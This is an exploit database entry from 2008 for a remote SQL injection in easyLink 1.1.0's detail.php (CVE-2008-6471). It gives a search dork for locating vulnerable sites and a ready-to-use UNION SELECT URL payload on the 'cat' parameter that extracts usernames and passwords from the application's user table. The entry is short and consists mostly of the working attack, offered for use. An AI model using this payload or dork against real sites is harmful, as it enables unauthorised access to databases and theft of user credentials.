easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability



EDB-ID: 6494 CVE: 2008-6471 OSVDB-ID: 48395
Author: Egypt Coder Published: 2008-09-19 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR

# milw0rm.com [2008-09-19]